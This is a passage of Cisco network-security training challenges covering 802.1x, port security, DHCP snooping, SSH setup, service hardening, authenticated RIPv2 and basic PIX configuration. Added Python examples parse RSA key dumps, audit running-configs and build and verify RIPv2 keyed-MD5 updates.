Delay EXEC startup on noisy lines
finger
Allow responses to finger requests
hide-telnet-addresses Hide destination addresses in telnet command
linenumber
enable line number banner for each exec

nagle                  Enable Nagle's congestion control algorithm
old-slip-prompts       Allow old scripts to operate with slip/ppp
pad                    Enable PAD commands
password-encryption    Encrypt system passwords
prompt                 Enable mode specific prompt
pt-vty-logging         Log significant VTY-Async events
sequence-numbers       Stamp logger messages with a sequence number
slave-log              Enable log capability of slave IPs
tcp-keepalives-in      Generate keepalives on idle incoming network connections
tcp-keepalives-out     Generate keepalives on idle outgoing network connections
tcp-small-servers      Enable small TCP servers (e.g., ECHO)
telnet-zeroidle        Set TCP window 0 when connection is idle
timestamps             Timestamp debug/log messages
udp-small-servers      Enable small UDP servers (e.g., ECHO)
(config)# service sequence-numbers
(config)# service dhcp
(config)# service finger
(config)# no service tcp-small-servers
(config)# no service udp-small-servers
(config)# service password-encryption

Cisco Switch Challenge 48


Outline
This challenge involves enabling 802.1x authentication.
Objectives
The objectives of this challenge are to:

Enable 802.1x.
Define re-authentication.

Example
> en
# config t
(config)# int fa0/1
(config-if)# dot1x ?
default
Configure Dot1x with default values for this port
host-mode
Set the Host mode for 802.1x on this interface
max-req
Max No.of Retries
port-control
set the port-control value
reauthentication Enable or Disable Reauthentication for this port
timeout
Various Timeouts
(config-if)# dot1x port-control ?
auto
PortState will be set to AUTO
force-authorized
PortState set to Authorized
force-unauthorized PortState will be set to UnAuthorized
(config-if)# dot1x port-control auto
(config-if)# dot1 reauthentication ?
<cr>
(config-if)# dot1x re-authentication
(config-if)# dot1 t ?
quiet-period
QuietPeriod in Seconds
reauth-period
Time after which an automatic re-authentication should be
initiated
server-timeout Timeout for Radius Retries
supp-timeout
Timeout for Supplicant retries
tx-period
Timeout for Supplicant Re-transmissions
(config-if)# dot1 t r ?
<1-65535> Enter a value between 1 and 65535
(config-if)# dot1x timeout reauth-period 180

Cisco Switch Challenge 49


Outline
This challenge involves enabling port security and the BPDU guard (to defend against
spanning-tree attacks).
Objectives
The objectives of this challenge are to:

Enable BPDU guard.
Enable port-security.
Define a maximum number of MAC addresses on a port.
Define a MAC address on a port.

Example
> en
# config t
Switch(config)# spanning-tree ?
backbonefast   Enable BackboneFast Feature
etherchannel   Spanning tree etherchannel specific configuration
extend         Spanning Tree 802.1t extensions
loopguard      Spanning tree loopguard options
mode           Spanning tree operating mode
mst            Multiple spanning tree configuration
pathcost       Spanning tree pathcost options
portfast       Spanning tree portfast options
uplinkfast     Enable UplinkFast Feature
vlan           VLAN Switch Spanning Tree
Switch(config)# spanning-tree portfast ?
bpdufilter  Enable portfast bdpu filter on this switch
bpduguard   Enable portfast bpdu guard on this switch
default     Enable portfast by default on all access ports
Switch(config)# spanning-tree portfast bpduguard ?
default  Enable bdpu guard by default on all portfast ports
Switch(config)# spanning-tree portfast bpduguard def ?
<cr>
Switch(config)# spanning-tree portfast bpduguard def
Switch(config)# int fa0/1
Switch(config-if)# sw po ?
aging
Port-security aging commands
mac-address Secure mac address
maximum
Max secure addrs
violation
Security Violation Mode
<cr>
Switch(config-if)# switchport mode access
Switch(config-if)# switchport port-security
Switch(config-if)# switchport port-security max ?
<1-5120> Maximum addresses
Switch(config-if)# switchport port-security maximum 5
Switch(config-if)# switchport port-security mac-address ?
H.H.H
48 bit mac address
sticky Configure dynamic secure addresses as sticky
Switch(config-if)# switchport port-security mac-address 0000.1111.2222

Cisco Switch Challenge 50


Outline
This challenge involves defending against an attacker depleting the DHCP pool using
DHCP snooping.
Objectives
The objectives of this challenge are to:

Enable DHCP snooping.
Apply DHCP snooping on an interface.

Example
> en
# config t
Switch(config)# ip dhcp ?
conflict
DHCP address conflict parameters
database
Configure DHCP database agents
excluded-address
Prevent DHCP from assigning certain addresses
limited-broadcast-address Use all 1's broadcast address
ping
Specify ping parameters used by DHCP
pool
Configure DHCP address pools
relay
DHCP relay agent parameters
smart-relay
Enable Smart Relay feature
snooping
DHCP Snooping
Switch(config)# ip dhcp snooping ?
information DHCP Snooping information
vlan
DHCP Snooping vlan
<cr>
Switch(config)# ip dhcp snooping
Switch(config)# ip dhcp snooping vlan ?
<1-4094> DHCP Snooping vlan first number
Switch(config)# ip dhcp snooping vlan 4
Switch(config)# int fa0/1
Switch(config-if)# ip dhcp ?
snooping DHCP Snooping
Switch(config-if)# ip dhcp snooping ?
limit DHCP Snooping limit
trust DHCP Snooping trust config
Switch(config-if)# ip dhcp snooping trust
Switch(config-if)# ip dhcp snooping limit ?
rate DHCP Snooping limit
Switch(config-if)# ip dhcp snooping limit rate ?
<1-4294967294> DHCP snooping rate limit
Switch(config-if)# ip dhcp snooping limit rate 30

19 Cisco Academy Network Security 1

Router Challenge 195


Outline: This challenge involves an analysis of SSH.
Objectives: The objectives of this challenge are to explain SSH.
The TELNET protocol is insecure, as the text is passed as plain text. An improved method is
to use SSH, which encrypts data. It requires that a domain name and an RSA key pair be defined:
# config t
Enter configuration commands, one per line. End with CNTL/Z.
(config)# hostname ap
ap(config)# username fred password bert
ap(config)# ip domain-name test.com
ap(config)# crypto key generate rsa
How many bits in the modulus [512]:
% Generating 512 bit RSA keys ...[OK]
ap # show crypto key mypubkey rsa
% Key pair was generated at: 00:39:47 UTC Mar 1 2002
Key name: ap.test.com
Usage: General Purpose Key
Key is not exportable.
Key Data:
305C300D 06092A86 4886F70D 01010105 00034B00 30480241 00CE28A6 6697D889
D28C19FD 3587872D ED4834F0 707B1D8F 944F665E 084DA46B 9D9C0BF4 E992059A
521A750B B9C09A7F E14275B9 AA29B962 BB0CCCAA 9FA30168 7B020301 0001
% Key pair was generated at: 00:39:56 UTC Mar 1 2002
Key name: ap.test.com.server
Usage: Encryption Key
Key is not exportable.
Key Data:
307C300D 06092A86 4886F70D 01010105 00036B00 30680261 00D56417 15E52D1C
26C2CE81 B264D2C0 9C52AD73 90731CF7 34D122BC 59CD560F 9600714C E8DB3AA8
1D80B1E7 74E194B2 3F6C6EA8 8D1505DB 485AD29F A982AB04 950DD4CA ED113E5F
78D60CFF 2B568C97 0CF21335 0DE55420 BD7929AE 763EDDB9 A1020301 0001
ap (config)# ip ssh ?
authentication-retries  Specify number of authentication retries
break-string            break-string
port                    Starting (or only) Port number to listen on
rsa                     Configure RSA keypair name for SSH
source-interface        Specify interface for source address in SSH connections
time-out                Specify SSH time-out interval
version                 Specify protocol version to be supported
ap (config)# ip ssh time-out ?
<1-120> SSH time-out interval (secs)
ap (config)# ip ssh time-out 60
ap (config)# ip ssh authentication-retries ?
<0-5> Number of authentication retries
ap (config)# ip ssh authentication-retries 2
ap (config)# ip ssh version ?
<1-2> Protocol version
ap (config)# ip ssh version 2
ap (config)# line vty 0 4
ap (config-line)# transport ?
input
Define which protocols to use when connecting to the terminal
server
output
Define which protocols to use for outgoing connections
preferred Specify the preferred protocol to use
(config-line)# transport input ?
all
All protocols
mop
DEC MOP Remote Console Protocol
none
No protocols
pad
X.3 PAD
rlogin Unix rlogin protocol
ssh
TCP/IP SSH protocol
telnet TCP/IP Telnet protocol
udptn
UDPTN async via UDP protocol
v120
Async over ISDN
ap (config-line)# transport input ssh
ap (config-line)# login ?
local
Local password checking
tacacs Use tacacs server for password checking
<cr>
ap (config-line)# login local
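
The `Key Data` block printed by `show crypto key mypubkey rsa` in Challenges 124 and 195 is a DER-encoded SubjectPublicKeyInfo: `30 5C` opens the outer SEQUENCE, `06 09 2A864886F70D010101` is the rsaEncryption OID, and the BIT STRING wraps an RSAPublicKey whose two INTEGERs are the modulus and the exponent (the trailing `02 03 01 00 01` is e = 65537). Parsing it lets a reviewer confirm from the dump alone that the default 512-bit modulus accepted at the `How many bits in the modulus [512]` prompt was used, a size that is factorable and that current SSH clients refuse. The parser below is an added example written for this page (not Cisco code); the two hex strings are the Challenge 195 dumps reassembled into their original eight-column rows, and the 2048-bit threshold in `assess()` is this example's own choice.

```python
RSA_OID = bytes.fromhex("2A864886F70D010101")   # 1.2.840.113549.1.1.1, rsaEncryption


def _read_tlv(buf, pos):
    """Read one DER tag/length/value at `pos`. Returns (tag, value, position after it).
    Handles the short length form and the long form (0x81, 0x82) for larger keys."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_ios_pubkey(hex_dump):
    """Parse the 'Key Data' hex from `show crypto key mypubkey rsa`, a DER-encoded
    SubjectPublicKeyInfo, and return (modulus_bits, public_exponent)."""
    der = bytes.fromhex("".join(hex_dump.split()))
    tag, spki, end = _read_tlv(der, 0)
    if tag != 0x30 or end != len(der):
        raise ValueError("outer SEQUENCE missing or length mismatch")
    tag, alg, pos = _read_tlv(spki, 0)                 # AlgorithmIdentifier
    oid_tag, oid, _ = _read_tlv(alg, 0)
    if tag != 0x30 or oid_tag != 0x06 or oid != RSA_OID:
        raise ValueError("not an rsaEncryption key")
    tag, bits, _ = _read_tlv(spki, pos)                # BIT STRING: 0x00 unused-bits byte + RSAPublicKey
    if tag != 0x03 or bits[0] != 0:
        raise ValueError("unexpected BIT STRING")
    tag, rsa_pub, _ = _read_tlv(bits, 1)
    n_tag, n_bytes, pos = _read_tlv(rsa_pub, 0)        # INTEGER n (leading 0x00 keeps it positive)
    e_tag, e_bytes, _ = _read_tlv(rsa_pub, pos)        # INTEGER e
    if tag != 0x30 or n_tag != 0x02 or e_tag != 0x02:
        raise ValueError("unexpected RSAPublicKey structure")
    n = int.from_bytes(n_bytes, "big")
    e = int.from_bytes(e_bytes, "big")
    return n.bit_length(), e


def assess(bits):
    """This example's acceptance rule for an SSH host key modulus."""
    if bits >= 2048:
        return "ok"
    return f"weak: {bits}-bit RSA modulus, regenerate with at least 2048 bits"


# Key Data exactly as printed in Challenge 195 above, reassembled into its eight-column rows.
GENERAL_PURPOSE_KEY = """
305C300D 06092A86 4886F70D 01010105 00034B00 30480241 00CE28A6 6697D889
D28C19FD 3587872D ED4834F0 707B1D8F 944F665E 084DA46B 9D9C0BF4 E992059A
521A750B B9C09A7F E14275B9 AA29B962 BB0CCCAA 9FA30168 7B020301 0001
"""
SERVER_KEY = """
307C300D 06092A86 4886F70D 01010105 00036B00 30680261 00D56417 15E52D1C
26C2CE81 B264D2C0 9C52AD73 90731CF7 34D122BC 59CD560F 9600714C E8DB3AA8
1D80B1E7 74E194B2 3F6C6EA8 8D1505DB 485AD29F A982AB04 950DD4CA ED113E5F
78D60CFF 2B568C97 0CF21335 0DE55420 BD7929AE 763EDDB9 A1020301 0001
"""

if __name__ == "__main__":
    for label, dump in (("ap.test.com", GENERAL_PURPOSE_KEY), ("ap.test.com.server", SERVER_KEY)):
        bits, e = parse_ios_pubkey(dump)
        print(f"{label}: {bits}-bit modulus, e={e}, {assess(bits)}")
```

The general-purpose key parses as 512 bits and the `.server` encryption key as 768 bits, both with e = 65537; answering the modulus prompt with 2048 (the `crypto key generate rsa modulus 2048` form on later IOS) is the fix, after which `show crypto key mypubkey rsa` prints a dump whose outer length uses the long form (`30 82 01 22`), which `_read_tlv` also handles.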

Cisco Router Challenge 196


Outline
This challenge involves the configuration of services on the router.
Objectives
The objectives of this challenge are to:

Define encrypted passwords.
Define timestamps.
Disable TCP small services.
Disable UDP small services.
Disable CDP on an interface.
Disable ICMP on an interface.
Disable SNMP.
Restrict Web access.

Example
> en
# config t
(config)# service ?
compress-config        Compress the configuration file
config                 TFTP load config files
dhcp                   Enable DHCP server and relay agent
disable-ip-fast-frag   Disable IP particle-based fast fragmentation
exec-callback          Enable exec callback
exec-wait              Delay EXEC startup on noisy lines
finger                 Allow responses to finger requests
hide-telnet-addresses  Hide destination addresses in telnet command
linenumber             enable line number banner for each exec
nagle                  Enable Nagle's congestion control algorithm
old-slip-prompts       Allow old scripts to operate with slip/ppp
pad                    Enable PAD commands
password-encryption    Encrypt system passwords
prompt                 Enable mode specific prompt
pt-vty-logging         Log significant VTY-Async events
sequence-numbers       Stamp logger messages with a sequence number
slave-log              Enable log capability of slave IPs
tcp-keepalives-in      Generate keepalives on idle incoming network connections
tcp-keepalives-out     Generate keepalives on idle outgoing network connections
tcp-small-servers      Enable small TCP servers (e.g., ECHO)
telnet-zeroidle        Set TCP window 0 when connection is idle
timestamps             Timestamp debug/log messages
udp-small-servers      Enable small UDP servers (e.g., ECHO)
(config)# service timestamps ?
debug Timestamp debug messages
log
Timestamp log messages
<cr>
(config)# service timestamps log ?
datetime Timestamp with date and time
uptime
Timestamp with system uptime
<cr>
(config)# service timestamps log datetime
(config)# sequence-numbers ?
compress-config
Compress the configuration file
config
TFTP load config files
dhcp
Enable DHCP server and relay agent
disable-ip-fast-frag
Disable IP particle-based fast fragmentation
exec-callback
Enable exec callback
exec-wait
Delay EXEC startup on noisy lines
finger
Allow responses to finger requests
hide-telnet-addresses Hide destination addresses in telnet command
linenumber
enable line number banner for each exec
nagle
Enable Nagle's congestion control algorithm
old-slip-prompts
Allow old scripts to operate with slip/ppp
pad
Enable PAD commands
password-encryption
Encrypt system passwords
prompt
Enable mode specific prompt
pt-vty-logging
Log significant VTY-Async events
sequence-numbers
Stamp logger messages with a sequence number
slave-log
Enable log capability of slave IPs
tcp-keepalives-in
Generate keepalives on idle incoming network
connections
tcp-keepalives-out
Generate keepalives on idle outgoing network
connections
tcp-small-servers
Enable small TCP servers (e.g., ECHO)
telnet-zeroidle
Set TCP window 0 when connection is idle
timestamps
Timestamp debug/log messages
udp-small-servers
Enable small UDP servers (e.g., ECHO)
(config)# service sequence-numbers
(config)# service dhcp
(config)# service finger
(config)# no service tcp-small-servers
(config)# no service udp-small-servers
(config)# service password-encryption

To disable ping on the interface:


(config)# int e0
(config-if)# no ip ?
Interface IP configuration subcommands:
access-group
Specify access control for packets
accounting
Enable IP accounting on this interface
address
Set the IP address of an interface
audit
Apply IDS audit name
auth-proxy
Apply authenticaton proxy
authentication
authentication subcommands
bandwidth-percent
Set EIGRP bandwidth limit
broadcast-address
Set the broadcast address of an interface
cef
Cisco Express Fowarding interface commands
cgmp
Enable/disable CGMP
dhcp
Configure DHCP parameters for this interface
directed-broadcast Enable forwarding of directed broadcasts
dvmrp
DVMRP interface commands
flow
NetFlow related commands
header-compression IPHC options
hello-interval
Configures IP-EIGRP hello interval
helper-address
Specify a destination address for UDP broadcasts
hold-time
Configures IP-EIGRP hold time
idle-group
Specify interesting packets for idle-timer
igmp
IGMP interface commands
information-reply
Enable sending ICMP Information Reply messages
inspect
Apply inspect name
irdp
ICMP Router Discovery Protocol
load-sharing
Style of load sharing
local-proxy-arp
Enable local-proxy ARP
mask-reply
Enable sending ICMP Mask Reply messages
mobile
Mobile IP support
mrm
Configure IP Multicast Routing Monitor tester
mroute-cache
Enable switching cache for incoming multicast packets
mtu
Set IP Maximum Transmission Unit
multicast
IP multicast interface commands
nat
NAT interface commands
nbar
Network-Based Application Recognition
next-hop-self
Configures IP-EIGRP next-hop-self
nhrp
NHRP interface subcommands
ospf
OSPF interface commands
pgm
PGM Reliable Transport Protocol
pim
PIM interface commands
policy
Enable policy routing
proxy-arp
Enable proxy ARP
rarp-server
Enable RARP server for static arp entries
redirects
Enable sending ICMP Redirect messages
rgmp
Enable/disable RGMP
rip
Router Information Protocol
route-cache
Enable fast-switching cache for outgoing packets
router
IP router interface commands
rsvp
RSVP Interface Commands
rtp
RTP parameters
sap
Session Announcement Protocol interface commands
security
DDN IP Security Option
split-horizon
Perform split horizon
summary-address
Perform address summarization
tcp
TCP header compression and other parameters
unnumbered
Enable IP processing without an explicit address
unreachables
Enable sending ICMP Unreachable messages
urd
Configure URL Rendezvousing
verify
Enable per packet validation
vrf
VPN Routing/Forwarding parameters on the interface
wccp
WCCP interface commands
(config-if)# no ip redirects
(config-if)# no ip unreachables
(config-if)# no ip mask-reply

To disable the multicast route cache (mroute-cache):
(config-if)# no ip mroute-cache
(config-if)# exit

To setup Web access from only a single host:


(config)# access-list 5 permit host 192.168.1.1
(config)# ip http access-class 5

And to disable SNMP:


(config)# no snmp-server
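The hardening steps in this challenge (disabling ICMP redirects, unreachables and mask replies, restricting the HTTP server to one host, turning SNMP off) are easy to apply once and forget on the next interface. The script below is an added example, not part of the NetworkSims material, that audits a running-config text for exactly those settings. The configuration it reads is constructed for the example; the interface and host names in it are made up.

```python
"""Audit an IOS running-config for the hardening shown in this challenge.

Added example, not NetworkSims' code. On IOS, 'ip redirects' and
'ip unreachables' are on by default, so their absence from an interface
block means they are still enabled; 'ip mask-reply' is off by default, so
the check looks for it being switched on. SNMP and the HTTP server are
checked at global level. SAMPLE_CONFIG is constructed sample data.
"""
import re

SAMPLE_CONFIG = """\
hostname mars
!
snmp-server community public RO
!
interface Ethernet0
 ip address 192.168.1.254 255.255.255.0
 no ip redirects
 no ip unreachables
 no ip mroute-cache
!
interface Ethernet1
 ip address 10.0.0.1 255.255.255.0
 ip mask-reply
!
ip http server
!
access-list 5 permit host 192.168.1.1
"""

REQUIRED_ON_INTERFACE = ("no ip redirects", "no ip unreachables")
FORBIDDEN_ON_INTERFACE = ("ip mask-reply",)


def parse_interfaces(config):
    """Return {interface name: [subcommand lines]} from a running-config."""
    interfaces = {}
    current = None
    for line in config.splitlines():
        if line.startswith("interface "):
            current = line.split(None, 1)[1]
            interfaces[current] = []
        elif line.startswith(" ") and current is not None:
            interfaces[current].append(line.strip())
        else:
            current = None          # '!' or a global command ends the block
    return interfaces


def audit(config):
    """Return a sorted list of (scope, finding) tuples; empty means clean."""
    findings = []
    for name, lines in parse_interfaces(config).items():
        for wanted in REQUIRED_ON_INTERFACE:
            if wanted not in lines:
                findings.append((name, f"missing '{wanted}'"))
        for bad in FORBIDDEN_ON_INTERFACE:
            if bad in lines:
                findings.append((name, f"has '{bad}'"))
    global_lines = [l for l in config.splitlines() if not l.startswith(" ")]
    if any(l.startswith("snmp-server") for l in global_lines):
        findings.append(("global", "snmp-server configured; disable with 'no snmp-server'"))
    if "ip http server" in global_lines and not any(
            re.match(r"ip http access-class \S+", l) for l in global_lines):
        findings.append(("global", "ip http server without 'ip http access-class'"))
    return sorted(findings)


if __name__ == "__main__":
    for scope, finding in audit(SAMPLE_CONFIG):
        print(f"{scope}: {finding}")
```

Feed it the output of `show running-config` saved to a file; an empty result means every interface carries the two `no ip ...` lines, no interface re-enables mask replies, SNMP is absent and the HTTP server is bound to an access-class.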

Cisco Router Challenge 197


Outline
This challenge involves the configuration of RIP Version 2 with authenticated routing tables.
Objectives
The objectives of this challenge are to:

Setup a RIP Version 2.


Define authentication for RIP.

Example
> en
# config t
(config)# router rip
(config-router)# version 2
(config-router)# network 194.205.128.0
(config-router)# ?
Router configuration commands:
address-family           Enter Address Family command mode
auto-summary             Enable automatic network number summarization
default                  Set a command to its defaults
default-information      Control distribution of default information
default-metric           Set metric of redistributed routes
distance                 Define an administrative distance
distribute-list          Filter networks in routing updates
exit                     Exit from routing protocol configuration mode
flash-update-threshold   Specify flash update threshold in second
help                     Description of the interactive help system
input-queue              Specify input queue depth
maximum-paths            Forward packets over multiple paths
neighbor                 Specify a neighbor router
network                  Enable routing on an IP network
no                       Negate a command or set its defaults
offset-list              Add or subtract offset from IGRP or RIP metrics
output-delay             Interpacket delay for RIP updates
passive-interface        Suppress routing updates on an interface
redistribute             Redistribute information from another routing protocol
timers                   Adjust routing timers
traffic-share            How to compute traffic share over alternate paths
validate-update-source   Perform sanity checks against source address of routing updates
version                  Set routing protocol version
(config-router)# exit
(config)# key ?
chain       Key-chain management
config-key  Set a private configuration key
(config)# key chain ?
WORD Key-chain name
(config)# key chain martin
(config-keychain)# ?
Key-chain configuration commands:
default  Set a command to its defaults
exit     Exit from key-chain configuration mode
key      Configure a key
no       Negate a command or set its defaults
(config-keychain)# key ?
<0-2147483647> Key identifier
(config-keychain)# key 1
(config-keychain-key)# ?
Key-chain key configuration commands:
accept-lifetime  Set accept lifetime of key
default          Set a command to its defaults
exit             Exit from key-chain key configuration mode
key-string       Set key string
no               Negate a command or set its defaults
send-lifetime    Set send lifetime of key
(config-keychain-key)# key-string officer
(config-keychain-key)# exit
(config-keychain)# exit
(config)# int e0
(config-if)# ip rip ?
advertise       Specify update interval
authentication  Authentication control
receive         advertisement reception
send            advertisement transmission
v2-broadcast    send ip broadcast v2 update
(config-if)# ip rip authentication ?
key-chain  Authentication key-chain
mode       Authentication mode
(config-if)# ip rip authentication key-chain ?
LINE name of key-chain
(config-if)# ip rip authentication key-chain martin
(config-if)# ip rip authentication mode ?
md5   Keyed message digest
text  Clear text authentication
(config-if)# ip rip authentication mode md5

Cisco Router Challenge 197


Outline
This challenge involves the configuration of RIP Version 2 with authenticated routing tables,
using a distribute-list and a passive interface.
Objectives
The objectives of this challenge are to:

Setup a RIP Version 2.


Define authentication for RIP.
Define a routing filter to limit the transmission of routing information.
Define a passive-interface for routing updates.

Example
> en
# config t
(config)# access-list 10 permit 10.0.0.0 0.0.0.255
(config)# router rip
(config-router)# distribute-list 10 in fa0/1
(config-router)# passive-interface fa0/2
(config-router)# version 2
(config-router)# network 194.205.128.0
(config-router)# exit
(config)# key chain martin
(config-keychain)# key 1
(config-keychain-key)# key-string officer
(config-keychain-key)# exit
(config-keychain)# exit
(config)# int fa0/1
(config-if)# ip rip authentication key-chain martin
(config-if)# ip rip authentication mode md5

The passive-interface command stops the transmission of the routing tables on the specified
interface.
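Both RIP challenges above end with `ip rip authentication mode md5` against key-chain `martin`, whose key 1 has the key-string `officer`. What that changes on the wire is that the key itself is never sent: each update carries a 16-byte MD5 digest computed over the packet and the zero-padded key (RFC 2082), plus a sequence number that lets the receiver reject replayed updates. The Python below is an added example, not NetworkSims' or Cisco's code, that builds such an update for the page's network `194.205.128.0` and verifies it the way a receiving router would. The packet layout follows my reading of RFC 2082 (authentication entry first, digest in a trailer entry); the route metric and sequence number are constructed sample values.

```python
"""RIPv2 keyed-MD5 authentication (RFC 2082), built and verified.

Added example, not NetworkSims' or Cisco's code. Layout per my reading of
RFC 2082: 4-byte RIP header, a 20-byte authentication entry (AFI 0xFFFF,
type 3, packet length, key id, digest length 16, sequence number), the
route entries, then a trailer (AFI 0xFFFF, type 1) followed by the 16-byte
digest. The digest is MD5 over everything before it with the key, padded
with zeros to 16 bytes, in the digest's place. Sample data is constructed.
"""
import hashlib
import hmac
import ipaddress
import struct

RIP_RESPONSE = 2
RIP_VERSION = 2
AUTH_AFI = 0xFFFF
AUTH_TYPE_MD5 = 3
TRAILER_TYPE = 0x0001
DIGEST_LEN = 16


def _route_entry(prefix, metric, next_hop="0.0.0.0"):
    """Encode one 20-byte RIPv2 route entry (AFI 2, route tag 0)."""
    net = ipaddress.ip_network(prefix)
    return struct.pack("!HH4s4s4sI", 2, 0, net.network_address.packed,
                       net.netmask.packed,
                       ipaddress.ip_address(next_hop).packed, metric)


def build_md5_update(routes, key_id, key, seq):
    """Return a RIPv2 response authenticated with keyed MD5.

    routes: iterable of (prefix, metric); key: bytes, at most 16 bytes.
    """
    if len(key) > DIGEST_LEN:
        raise ValueError("RFC 2082 keys are at most 16 bytes")
    header = struct.pack("!BBH", RIP_RESPONSE, RIP_VERSION, 0)
    entries = b"".join(_route_entry(p, m) for p, m in routes)
    pkt_len = 4 + 20 + len(entries)      # offset of the trailer
    auth_entry = struct.pack("!HHHBBIII", AUTH_AFI, AUTH_TYPE_MD5, pkt_len,
                             key_id, DIGEST_LEN, seq, 0, 0)
    trailer_hdr = struct.pack("!HH", AUTH_AFI, TRAILER_TYPE)
    unsigned = header + auth_entry + entries + trailer_hdr
    digest = hashlib.md5(unsigned + key.ljust(DIGEST_LEN, b"\x00")).digest()
    return unsigned + digest


def verify_md5_update(packet, key_chain, last_seq=None):
    """Check a received update against a {key_id: key} chain.

    Returns (ok, reason). Mirrors the receiver: parse the auth entry, look
    up the key id the sender named, recompute the digest, and reject a
    sequence number that does not advance past the last accepted one.
    """
    if len(packet) < 4 + 20 + 4 + DIGEST_LEN:
        return False, "too short"
    afi, atype, pkt_len, key_id, dlen, seq, _, _ = struct.unpack_from(
        "!HHHBBIII", packet, 4)
    if afi != AUTH_AFI or atype != AUTH_TYPE_MD5 or dlen != DIGEST_LEN:
        return False, "not keyed-MD5 authenticated"
    if pkt_len + 4 + DIGEST_LEN != len(packet):
        return False, "bad packet length"
    key = key_chain.get(key_id)
    if key is None:
        return False, f"unknown key id {key_id}"
    unsigned, received = packet[:pkt_len + 4], packet[pkt_len + 4:]
    expected = hashlib.md5(unsigned + key.ljust(DIGEST_LEN, b"\x00")).digest()
    if not hmac.compare_digest(expected, received):
        return False, "digest mismatch"
    if last_seq is not None and seq <= last_seq:
        return False, "replayed sequence number"
    return True, "ok"


if __name__ == "__main__":
    chain = {1: b"officer"}                      # key chain martin, key 1
    update = build_md5_update([("194.205.128.0/24", 1)], 1, b"officer", 7)
    print(len(update), "bytes;", verify_md5_update(update, chain))
    print(verify_md5_update(update, {1: b"wrong"}))
```

The key-chain lookup by key id is why both routers must agree on the key number as well as the key-string, and the sequence check is what the page's `accept-lifetime`/`send-lifetime` options build on when keys are rotated.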

Cisco PIX Challenge 1


Outline
This challenge involves the configuration of basic PIX details.
Objectives
The objectives of this challenge are to:

Setup the hostname.


Define the domain name.
Setup IP address of E0.
Enable E0.

Example (Version 6.x)


# sh ip add
System IP Addresses:
IP address outside 0.0.0.0
IP address inside 0.0.0.0
IP address inf2 0.0.0.0
Current IP Addresses:
IP address outside 0.0.0.0
IP address inside 0.0.0.0
IP address inf2 0.0.0.0
# sh nameif
# config t
(config)# help hos
USAGE:
hostname <name>
show hostname [fqdn]
DESCRIPTION:
hostname

Change host name

(config)# hostname freds


(config)# domain-name fred.com
(config)# help domain
USAGE:
[no] domain-name <name>
clear configure domain-name
DESCRIPTION:
domain-name
Change domain name
(config)# ip address outside 192.168.1.1 255.255.255.0
(config)# interface e0 auto
(config)# exit
# show ip add
# show running
# sh int e0

Interface Ethernet0 outside, is up, line protocol is up
Hardware is i82559, BW 100 Mbps
Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
MAC address 000d.6585.77d9, MTU 1500
IP address 192.168.1.1, subnet mask 255.255.255.0
0 packets input, 0 bytes, 0 no buffer
Received 0 broadcasts, 0 runts, 0 giants
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
1 packets output, 64 bytes, 0 underruns
0 output errors, 0 collisions, 0 interface resets
0 babbles, 0 late collisions, 0 deferred
0 lost carrier, 0 no carrier
input queue (curr/max blocks): hardware (128/128) software (0/0)
output queue (curr/max blocks): hardware (0/1) software (0/1)
Received 0 VLAN untagged packets, 0 bytes
Transmitted 1 VLAN untagged packets, 28 bytes
Dropped 0 VLAN untagged packets

Example (Version 7.x)


# sh nameif
# config t
(config)# help hostname
USAGE:
hostname <name>
show hostname [fqdn]
DESCRIPTION:
hostname

Change host name

(config)# help domain
USAGE:
[no] domain-name <name>
clear configure domain-name
DESCRIPTION:
domain-name
Change domain name
(config)# hostname ?
configure mode commands/options:
WORD < 64 char Host name for this system. A hostname must start and end with
a letter or digit and have as interior characters only
letters, digits, or a hyphen.
(config)# hostname freds
(config)# domain-name ?
configure mode commands/options:
WORD Domain names must begin and end with a digit/letter, only letters,
digits, and hyphen are allowed as internal characters, labels are
separated by a dot. A maximum of 63 characters is allowed.
(config)# domain-name fred.com
(config)# int e0
(config-if)# help ip
USAGE:
[no] ip address <ip_address> [<mask>] [standby <sby_ip_addr>]
[no] ip address dhcp [setroute] [retry <4-16>]
show ip address [<interface> | <if_name>]
clear ip
DESCRIPTION:
ip             Set the ip address and mask for an interface
SYNTAX:
<ip_address>   Device's network interface address
<mask>         Netmask of ip_address
<sby_ip_addr>  Device failover peer's network interface address
<4-16>         Number of retries performed by dhcp client, default is 4
<interface>:   Interface hardware name as used by 'interface' command.
               Composed of <type> <port>[/<subif_number>] or
               <type> <slot>/<port>[/<subif_number>]
<if_name>:     Interface name assigned by 'nameif' command

see also:
nameif, security-level
(config-if)# ip address outside 192.168.1.1 255.255.255.0
(config-if)# help shut
USAGE:
[no] shutdown
DESCRIPTION:
shutdown
Shutdown the selected interface
(config-if)# no shutdown
(config-if)# exit
(config)# exit
# show ip add
# sh ip add
System IP Addresses:
IP address outside 192.168.1.1
IP address inside 0.0.0.0
IP address inf2 0.0.0.0
Current IP Addresses:
IP address outside 0.0.0.0
IP address inside 0.0.0.0
IP address inf2 0.0.0.0
# show running
myPIX # sh int e0
Interface Ethernet0 outside, is up, line protocol is up
Hardware is i82559, BW 100 Mbps
Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
MAC address 000d.6585.77d9, MTU 1500
IP address 192.168.1.1, subnet mask 255.255.255.0
0 packets input, 0 bytes, 0 no buffer
Received 0 broadcasts, 0 runts, 0 giants
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
1 packets output, 64 bytes, 0 underruns
0 output errors, 0 collisions, 0 interface resets
0 babbles, 0 late collisions, 0 deferred
0 lost carrier, 0 no carrier
input queue (curr/max blocks): hardware (128/128) software (0/0)
output queue (curr/max blocks): hardware (0/1) software (0/1)
Received 0 VLAN untagged packets, 0 bytes
Transmitted 1 VLAN untagged packets, 28 bytes
Dropped 0 VLAN untagged packets

myPIX # sh int e1
Interface Ethernet1 inside, is down, line protocol is down
Hardware is i82559, BW 100 Mbps
Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
MAC address 000d.6585.77d9, MTU 1500
IP address 0.0.0.0, subnet mask 255.255.255.0
0 packets input, 0 bytes, 0 no buffer
Received 0 broadcasts, 0 runts, 0 giants
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
1 packets output, 64 bytes, 0 underruns
0 output errors, 0 collisions, 0 interface resets
0 babbles, 0 late collisions, 0 deferred
